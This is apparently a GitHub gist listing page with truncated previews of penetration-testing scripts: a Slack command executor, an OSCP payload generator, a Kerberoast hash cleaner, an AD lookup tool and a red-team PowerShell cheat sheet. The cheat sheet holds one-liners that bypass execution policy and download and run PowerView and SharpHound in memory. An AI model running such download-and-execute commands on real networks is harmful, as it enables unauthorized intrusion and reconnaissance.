Skip to content

Instantly share code, notes, and snippets.

@m8r0wn
m8r0wn / slackexec.py
Last active Mar 14, 2021
Python script to monitor a Slack channel and automate task execution.
View slackexec.py
#!/usr/bin/env python3
# Author: m8r0wn
import os
import threading
from sys import exit
from time import sleep
from datetime import datetime
from subprocess import getoutput
from taser.proto.http import web_request
View myspider.py
#!/usr/bin/env python3
from sys import argv
from taser.proto.http.spider import Spider
from taser.proto.http import extract_subdomain
from taser.logx import setup_consoleLogger
class MySpider(Spider):
def __init__(self, url):
Spider.__init__(self, url)
self.ur = url
View oscp_payload_generator.sh
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# m8r0wn
# Note: It is recommeneded to create a new directory before running this
# script. All payloads will be placed in the current directory
IP="127.0.0.1" # <YOUR IP HERE>
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
@m8r0wn
m8r0wn / clean_kirbi.py
Last active Jun 16, 2020
Extract hashes from Empires: "Invoke-kerberoast -OutputFormat Hashcat", for cracking.
View clean_kirbi.py
from sys import argv
# Clean Kerberose hashes taken from invoke-kerberoast -hashcat output
hashes = [line.strip() for line in open(argv[1])]
hash_capture = False
hash_value = ''''''
for line in hashes:
@m8r0wn
m8r0wn / RedTeam_CheatSheet.ps1
Last active May 5, 2021
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
View RedTeam_CheatSheet.ps1
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
View aduser_lookup.sh
#!/usr/bin/env bash
# Author: m8r0wn
# Description: Uses the Linux net commands to lookup a user in Active Directory
# This is the Linux equivalent of: net user [Username] /domain
# Usage: ./aduser_lookup.sh [username] [password] [DC-Server] [Lookup-User]
if [ ! $1 ];
then
printf "[-] Usage: $0 Username Password DC_Server username_to_lookup\n"
@m8r0wn
m8r0wn / pastebin_api.py
Last active Mar 8, 2021
Python class to interact with the Pastebin API
View pastebin_api.py
#!/usr/bin/env python2.7
# Author: m8r0wn
# Description: Python class to interact with Pastebin API
import urllib2
import urllib
class paste_it():
#Class Variables